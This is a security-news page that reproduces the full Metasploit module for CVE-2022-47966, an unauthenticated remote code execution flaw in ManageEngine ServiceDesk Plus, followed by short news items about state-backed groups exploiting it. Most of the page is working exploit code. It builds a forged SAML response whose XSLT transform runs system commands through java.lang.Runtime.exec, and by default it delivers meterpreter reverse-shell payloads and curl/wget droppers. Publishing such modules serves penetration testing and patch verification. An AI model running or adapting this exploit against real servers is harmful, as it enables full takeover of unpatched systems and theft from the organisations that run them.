Security
Headlines
HeadlinesLatestCVEs

Headline

Zoho ManageEngine ServiceDesk Plus 14003 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Packet Storm
#vulnerability#windows#linux#apache#git#java#rce#xpath#auth
# This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ManageEngine ServiceDesk Plus Unauthenticated SAML RCE',        'Description' => %q{          This exploits an unauthenticated remote code execution vulnerability          that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and          below (CVE-2022-47966). Due to a dependency to an outdated library          (Apache Santuario version 1.4.1), it is possible to execute arbitrary          code by providing a crafted `samlResponse` XML to the ServiceDesk Plus          SAML endpoint. Note that the target is only vulnerable if it has been          configured with SAML-based SSO at least once in the past, regardless of          the current SAML-based SSO status.        },        'Author' => [          'Khoa Dinh', # Original research          'horizon3ai', # PoC          'Christophe De La Fuente' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-47966'],          ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],          ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],          ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']        ],        'Platform' => ['win', 'unix', 'linux'],        'Payload' => {          'BadChars' => "\x27"        },        'Targets' => [          [            'Windows EXE Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :windows_dropper,              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_command,              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },              'CmdStagerFlavor' => %w[curl wget echo lwprequest]            }          ]        ],        'DefaultOptions' => {          'RPORT' => 8080        },        'DefaultTarget' => 1,        'DisclosureDate' => '2023-01-10',        'Notes' => {          'Stability' => [CRASH_SAFE,],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        },        'Privileged' => true      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])    ])  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'])    )    return CheckCode::Unknown unless res    # vulnerable servers respond with 400 and a HTML body    return CheckCode::Safe unless res.code == 400    script = res.get_html_document.xpath('//script[contains(text(), "BUILD_NUMBER")]')    info = script.text.match(/PRODUCT_NAME\\x22\\x3A\\x22(?<product>.+?)\\x22,.*BUILD_NUMBER\\x22\\x3A\\x22(?<build>[0-9]+?)\\x22,/)    return CheckCode::Unknown unless info    unless info[:product] == 'ManageEngine\\x20ServiceDesk\\x20Plus'      return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})")    end    # SAML 2.0 support has been added in build 10511    # see https://www.manageengine.com/products/service-desk/on-premises/readme.html#readme105    build = Rex::Version.new(info[:build])    unless build >= Rex::Version.new('10511') && build <= Rex::Version.new('14003')      return CheckCode::Safe("Target build is #{info[:build]}")    end    CheckCode::Appears  end  def encode_begin(real_payload, reqs)    super    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw    end  end  def exploit    case target['Type']    when :windows_command, :unix_cmd      execute_command(payload.encoded)    when :windows_dropper, :linux_dropper      execute_cmdstager(delay: datastore['DELAY'])    end  end  def execute_command(cmd, _opts = {})    case target['Type']    when :windows_dropper      cmd = "cmd /c #{cmd}"    when :unix_cmd, :linux_dropper      cmd = cmd.gsub(' ') { '${IFS}' }      cmd = "bash -c #{cmd}"    end    cmd = cmd.encode(xml: :attr).gsub('"', '')    assertion_id = "_#{SecureRandom.uuid}"    # Randomize variable names and make sure they are all different using a Set    vars = Set.new    loop do      vars << Rex::Text.rand_text_alpha_lower(5..8)      break unless vars.size < 3    end    vars = vars.to_a    saml = <<~EOS      <?xml version="1.0" encoding="UTF-8"?>      <samlp:Response        ID="_#{SecureRandom.uuid}"        InResponseTo="_#{Rex::Text.rand_text_hex(32)}"        IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">        <samlp:Status>          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>        </samlp:Status>        <Assertion ID="#{assertion_id}"          IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">            <ds:SignedInfo>              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>              <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>              <ds:Reference URI="##{assertion_id}">                <ds:Transforms>                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">                    <xsl:stylesheet version="1.0"                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                      <xsl:template match="/">                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>                        <xsl:value-of select="$#{vars[2]}"/>                      </xsl:template>                    </xsl:stylesheet>                  </ds:Transform>                </ds:Transforms>                <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>                <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>              </ds:Reference>            </ds:SignedInfo>            <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue>            <ds:KeyInfo/>          </ds:Signature>        </Assertion>      </samlp:Response>    EOS    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'vars_post' => {        'SAMLResponse' => Rex::Text.encode_base64(saml)      }    })    unless res&.code == 500      lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)      unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }        elog("Unkown error returned:\n#{lines.join("\n")}")        fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code}). See logs for details.")      end      fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)')    end    res  endend

Related news

Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate

CISA Warning: Nation-State Hackers Exploit Fortinet and Zoho Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that multiple nation-state actors are exploiting security flaws in Fortinet FortiOS SSL-VPN and Zoho ManageEngine ServiceDesk Plus to gain unauthorized access and establish persistence on compromised systems. “Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized

Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware

The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called such as QuiteRAT. Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

China's 'Volt Typhoon' APT Turns to Zoho ManageEngine for Fresh Cyberattacks

A recent campaign shows that the politically motivated threat actor has more tricks up its sleeve than previously known, targeting an old RCE flaw and wiping logs to cover their tracks.

Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code

The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a

Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems

An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 to mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align

Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access

Zoho ManageEngine Endpoint Central / MSP 10.1.2228.10 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10 and below (CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the Endpoint Central SAML endpoint. Note that the target is only vulnerable if it is configured with SAML-based SSO, and the service should be active.

ManageEngine ADSelfService Plus Unauthenticated SAML Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine AdSelfService Plus versions 6210 and below. Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ADSelfService Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Unpatched Zoho MangeEngine Products Under Active Cyberattack

The latest critical bug is exploitable in dozens of ManageEngine products and exposes systems to catastrophic risks, researchers warn.

Zoho ManageEngine PoC Exploit to be Released Soon - Patch Before It's Too Late!

Users of Zoho ManageEngine are being urged to patch their instances against a critical security vulnerability ahead of the release of a proof-of-concept (PoC) exploit code. The issue in question is CVE-2022-47966, an unauthenticated remote code execution vulnerability affecting several products due to the use of an outdated third-party dependency, Apache Santuario. "This vulnerability allows an

Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability

Categories: Exploits and vulnerabilities Categories: News Tags: Zoho Tags: ManageEngine Tags: PoC Tags: RCE Tags: CVE-2022-47966 Tags: CVE-2022-35405 Tags: SAML Tags: Apache Santuario Proof of Concept code is about to be released for a vulnerability in many ManageEngine products which could enable RCE with SYSTEM privileges. (Read more...) The post Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability appeared first on Malwarebytes Labs.

CVE-2019-19034: AssetExplorer ITAM Solution ServicePacks Readme

Zoho ManageEngine Asset Explorer 6.5 does not validate the System Center Configuration Manager (SCCM) database username when dynamically generating a command to schedule scans for SCCM. This allows an attacker to execute arbitrary commands on the AssetExplorer Server with NT AUTHORITY/SYSTEM privileges.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution